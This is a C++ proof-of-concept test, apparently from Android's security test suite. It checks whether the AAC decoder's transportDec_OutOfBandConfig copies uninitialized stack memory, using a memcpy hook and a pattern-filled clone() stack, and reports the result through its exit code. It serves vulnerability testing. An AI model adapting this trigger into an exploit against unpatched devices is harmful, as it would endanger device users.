/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <atomic>
#include <iostream>
#include <unistd.h>
#include <dlfcn.h>
#include <common.h>

#include "tpdec_lib.h"

// Size in bytes of the heap block used as the clone()d child's stack.
#define STACK_SIZE 16384
// Number of bytes the memcpy hook scans, starting at the copy destination,
// for the INITIAL_VAL fill pattern.
#define SIZE_OF_VULNERABLE_MEMORY 1024
// Bytes allocated for the opaque decoder handle passed to
// transportDec_OutOfBandConfig(). NOTE(review): presumably matches
// sizeof(struct TRANSPORTDEC) for the target build — confirm.
#define TRANSPORTDEC_SIZE 5776
// Fill byte written over the child's stack by main(); the memcpy hook treats
// finding it near a copy destination as the vulnerable condition.
#define INITIAL_VAL 0xBE
// Maximum number of one-second waits main() makes for the child to finish.
#define TIMEOUT_IN_SECONDS 540

// Out-of-band config handed to transportDec_OutOfBandConfig(): `length` zero
// bytes on layer 0. The memcpy hook only inspects copies of exactly `length`
// bytes.
const UINT length = 200;
UCHAR conf[length] = { 0 };
UINT layer = 0;

// Written from the clone(CLONE_VM) child and read by main(). std::atomic makes
// the hand-off well-defined: once main() observes isPocExecutionComplete, any
// isVulnerable store the child made before it is guaranteed to be visible.
std::atomic<bool> isVulnerable{false};
std::atomic<bool> isPocExecutionComplete{false};

// Next memcpy in the symbol lookup chain, resolved lazily by memory_copy_init().
static void* (*real_memcpy)(void*, const void*, size_t) = nullptr;
static bool s_memory_copy_initialized = false;

/**
 * Child entry point passed to clone().
 *
 * Feeds the zero-filled `conf` buffer (`length` bytes, layer `layer`) to
 * transportDec_OutOfBandConfig() on the decoder handle, then raises
 * isPocExecutionComplete so main() can stop waiting.
 *
 * @param sTp  decoder buffer allocated and zeroed by main().
 * @return EXIT_SUCCESS always; the decoder call's result is not inspected.
 */
int poc(void *sTp) {
    struct TRANSPORTDEC *decoder = (struct TRANSPORTDEC *) sTp;
    transportDec_OutOfBandConfig(decoder, conf, length, layer);

    // Signal main() that the PoC call has returned.
    isPocExecutionComplete = true;
    return EXIT_SUCCESS;
}

/**
 * Resolves the next `memcpy` in the symbol lookup order (RTLD_NEXT) so the
 * interposing memcpy in this file can forward real copies to it.
 *
 * On success, stores the pointer in real_memcpy and sets
 * s_memory_copy_initialized. On failure, real_memcpy is left null and the
 * flag is not touched.
 */
void memory_copy_init(void) {
    void *const next_symbol = dlsym(RTLD_NEXT, "memcpy");
    real_memcpy =
        reinterpret_cast<void *(*)(void *, const void *, size_t)>(next_symbol);
    if (real_memcpy != nullptr) {
        s_memory_copy_initialized = true;
    }
}

/**
 * Interposed memcpy that doubles as the vulnerability oracle.
 *
 * For copies of exactly `length` bytes, scans SIZE_OF_VULNERABLE_MEMORY bytes
 * starting at `destination` for the INITIAL_VAL fill pattern that main()
 * writes over the child's stack. The scan runs before the copy. A match sets
 * isVulnerable. The copy is then forwarded to the next memcpy in the lookup
 * chain (resolved via memory_copy_init()).
 *
 * NOTE(review): for 200-byte copies whose destination is not on the child's
 * stack, the scan may read past the destination object; this is the PoC's
 * detection heuristic and is kept as-is.
 *
 * @return destination, like the standard memcpy.
 */
void* memcpy(void* destination, const void* source, size_t num) {
    if (!s_memory_copy_initialized) {
        memory_copy_init();
    }
    if (num == length) {
        // Compare as unsigned char. INITIAL_VAL (0xBE) is 190 as an int, and a
        // signed char (e.g. on x86 ABIs) holds -66 there, so a plain `char`
        // comparison could never match and the oracle would silently miss.
        const unsigned char *scan = static_cast<const unsigned char *>(destination);
        for (size_t i = 0; i < SIZE_OF_VULNERABLE_MEMORY; ++i) {
            if (scan[i] == INITIAL_VAL) {
                isVulnerable = true;
                break;
            }
        }
    }
    if (real_memcpy == nullptr) {
        // dlsym() could not resolve the next memcpy: copy by hand rather than
        // call through a null pointer. volatile keeps the compiler from
        // turning this loop back into a (recursive) memcpy() call.
        volatile unsigned char *dst = static_cast<volatile unsigned char *>(destination);
        const volatile unsigned char *src =
            static_cast<const volatile unsigned char *>(source);
        for (size_t i = 0; i < num; ++i) {
            dst[i] = src[i];
        }
        return destination;
    }
    return real_memcpy(destination, source, num);
}

/**
 * Runs poc() on a clone(CLONE_VM) child whose stack is pre-filled with
 * INITIAL_VAL. Waits up to TIMEOUT_IN_SECONDS seconds for the child to finish.
 *
 * @return EXIT_VULNERABLE if the memcpy hook flagged the pattern,
 *         EXIT_SUCCESS otherwise, or EXIT_FAILURE if an allocation or
 *         clone() fails.
 */
int main() {
    void *sTp = malloc(TRANSPORTDEC_SIZE);
    if (!sTp) {
        return EXIT_FAILURE;
    }
    char *ptr = (char *) malloc(STACK_SIZE);
    if (!ptr) {
        free(sTp);
        return EXIT_FAILURE;
    }
    memset(sTp, 0x00, TRANSPORTDEC_SIZE);
    // Known pattern on the child's stack: the memcpy hook looks for it to tell
    // whether a copy destination lies in not-yet-written stack memory.
    memset(ptr, INITIAL_VAL, STACK_SIZE);
    // clone() takes the top of the stack block (stacks grow downward on the
    // supported architectures, see clone(2)).
    if (clone(&poc, ptr + STACK_SIZE, CLONE_VM, sTp) == -1) {
        // Without this check a failed clone() would burn the full timeout.
        free(ptr);
        free(sTp);
        return EXIT_FAILURE;
    }
    int sleepCounter = 0;
    while (!isPocExecutionComplete && sleepCounter < TIMEOUT_IN_SECONDS) {
        sleep(1);
        ++sleepCounter;
    }
    if (isPocExecutionComplete) {
        free(ptr);
        free(sTp);
    }
    // Otherwise the timeout expired while the child may still be running on
    // `ptr` and using `sTp`; they are intentionally not freed to avoid a
    // use-after-free in the child.
    return (isVulnerable ? EXIT_VULNERABLE : EXIT_SUCCESS);
}
